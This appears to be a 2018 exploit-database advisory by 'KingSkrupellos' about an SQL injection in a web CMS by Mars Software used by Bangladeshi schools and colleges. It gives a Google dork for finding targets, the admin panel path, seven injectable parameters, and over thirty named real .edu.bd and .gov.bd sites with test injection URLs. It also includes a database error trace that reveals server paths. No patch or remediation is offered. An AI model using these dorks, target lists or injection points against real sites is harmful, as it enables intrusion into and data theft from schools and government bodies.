Designed & Developed By Mars Software International Ltd Marssil Bangladesh Education SQL Injection Vulnerability

2018.11.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : Designed & Developed By Mars Software International Ltd Marssil Bangladesh Education SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 06/11/2018 # Vendor Homepage : marssil.com # Tested On : Windows and Linux # Version Information: Microsoft .NET Framework Version:2.0.50727.8793; ASP.NET Version:2.0.50727.8745 # Category : WebApps # Google Dorks : intext:''Designed & Developed By : Mars Software International Ltd.'' site:edu.bd # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Admin Panel Login Path : /admin_data.aspx ################################################################################################# # SQL Injection Exploit : /View_Question_Answer.aspx?articleId=[SQL Injection] /View_Doc.aspx?articleId=[SQL Injection] /Class_Detail.aspx?classid=[SQL Injection] /View_Community_Radio.aspx?articleId=[SQL Injection] /View_Contact.aspx?articleId=[SQL Injection] /View_Teacher.aspx?articleId=[SQL Injection] /View_Page_Marquee.aspx?articleId=[SQL Injection] ################################################################################################# # Example Vulnerable Sites => [+] chapainawabganjttc.gov.bd/View_Question_Answer.aspx?articleId=1%27 [+] kadamshaharhs.edu.bd/View_Question_Answer.aspx?articleId=1%27 [+] charghatmahadicollege.edu.bd/View_Doc.aspx?articleId=1%27 [+] bksskhulna.edu.bd/View_Question_Answer.aspx?articleId=1%27 [+] pallimangalsecschool.edu.bd/View_Question_Answer.aspx?articleId=1%27 [+] premtalicoll.edu.bd/View_Question_Answer.aspx?articleId=1%27 [+] jhikraparaahs.edu.bd/View_Question_Answer.aspx?articleId=1%27 [+] rajabarihhs.edu.bd/View_Question_Answer.aspx?articleId=1%27 [+] rm.edu.bd/View_Doc.aspx?articleId=1%27 [+] bgghs.edu.bd/View_Doc.aspx?articleId=1%27 [+] rhghs.edu.bd/View_Doc.aspx?articleId=1%27 [+] godacol.edu.bd/View_Doc.aspx?articleId=1%27 [+] afzp.edu.bd/View_Doc.aspx?articleId=1%27 [+] aks.edu.bd/View_Doc.aspx?articleId=1%27 [+] iet.edu.bd/View_Doc.aspx?articleId=1%27 [+] cadkhs.edu.bd/View_Doc.aspx?articleId=1%27 [+] gmdc.edu.bd/View_Doc.aspx?articleId=1%27 [+] jghs.edu.bd/View_Doc.aspx?articleId=1%27 [+] rajabarihhs.edu.bd/View_Doc.aspx?articleId=1%27 [+] aks.edu.bd/View_Doc.aspx?articleId=1%27 [+] cadkhs.edu.bd/View_Doc.aspx?articleId=1%27 [+] premtalicoll.edu.bd/View_Doc.aspx?articleId=1%27 [+] ranihatimlhs.edu.bd/View_Doc.aspx?articleId=1%27 [+] bamlahalhs.edu.bd/View_Doc.aspx?articleId=1%27 [+] pn.edu.bd/View_Doc.aspx?articleId=1%27 [+] sardahgphs.edu.bd/View_Doc.aspx?articleId=1%27 [+] digramhs.edu.bd/View_Doc.aspx?articleId=1%27 [+] bhatoparaghs.edu.bd/View_Doc.aspx?articleId=1%27 [+] boliadaingahs.edu.bd/View_Doc.aspx?articleId=1%27 [+] nucghs.edu.bd/View_Doc.aspx?articleId=1%27 [+] anupnagarghs.edu.bd/View_Doc.aspx?articleId=1%27 [+] mkadegreecollege.edu.bd/View_Doc.aspx?articleId=1%27 [+] pakrihs.edu.bd/View_Doc.aspx?articleId=1%27 ################################################################################################# # SQL Database Error [ MSSQL Error Based Injection ] Server Error in '/' Application. Error converting data type nvarchar to int. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Exception Details: System.Data.SqlClient.SqlException: Error converting data type nvarchar to int. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''4''' at line 1 Source Error: Line 1237: public static DataSet dae_QA(string articleId) Line 1238: { Line 1239: DataSet ds = SqlHelper.ExecuteDataset(new SqlConnection(WebsiteConfig.ConnectionString), Line 1240: CommandType.StoredProcedure, Line 1241: "Article_Ais_QA", Source File: c:\Hosting\Mars\_edu_sites\chapainawabganjttc.gov.bd\App_Code\Articles.cs Line: 1239 Stack Trace: [SqlException (0x80131904): Error converting data type nvarchar to int.] System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection) +212 System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj) +245 System.Data.SqlClient.TdsParser.Run(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj) +2843 System.Data.SqlClient.SqlDataReader.ConsumeMetaData() +127 System.Data.SqlClient.SqlDataReader.get_MetaData() +112 System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString) +6340436 System.Data.SqlClient.SqlCommand.RunExecuteReaderTds(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, Boolean async) +6341505 System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method, DbAsyncResult result) +424 System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method) +28 System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior, String method) +211 System.Data.SqlClient.SqlCommand.ExecuteDbDataReader(CommandBehavior behavior) +19 System.Data.Common.DbCommand.System.Data.IDbCommand.ExecuteReader(CommandBehavior behavior) +19 System.Data.Common.DbDataAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) +221 System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) +573 System.Data.Common.DbDataAdapter.Fill(DataSet dataSet) +166 Microsoft.ApplicationBlocks.Data.SqlHelper.ExecuteDataset(SqlConnection connection, CommandType commandType, String commandText, SqlParameter[] commandParameters) +370 Articles.dae_QA(String articleId) in c:\Hosting\Mars\_edu_sites\chapainawabganjttc.gov.bd\App_Code\Articles.cs:1239 View_Question_Answer.Articledata() in c:\Hosting\Mars\_edu_sites\chapainawabganjttc.gov.bd\View_Question_Answer.aspx.cs:28 View_Question_Answer.Page_Load(Object sender, EventArgs e) in c:\Hosting\Mars\_edu_sites\ chapainawabganjttc.gov.bd\View_Question_Answer.aspx.cs:18 System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25 System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +42 System.Web.UI.Control.OnLoad(EventArgs e) +132 System.Web.UI.Control.LoadRecursive() +66 System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2428 Version Information: Microsoft .NET Framework Version:2.0.50727.8793; ASP.NET Version:2.0.50727.8745 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################

References:

https://www.cyberizm.org/cyberizm-mars-software-international-ltd-marssil-bd-edu-sql-inj.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top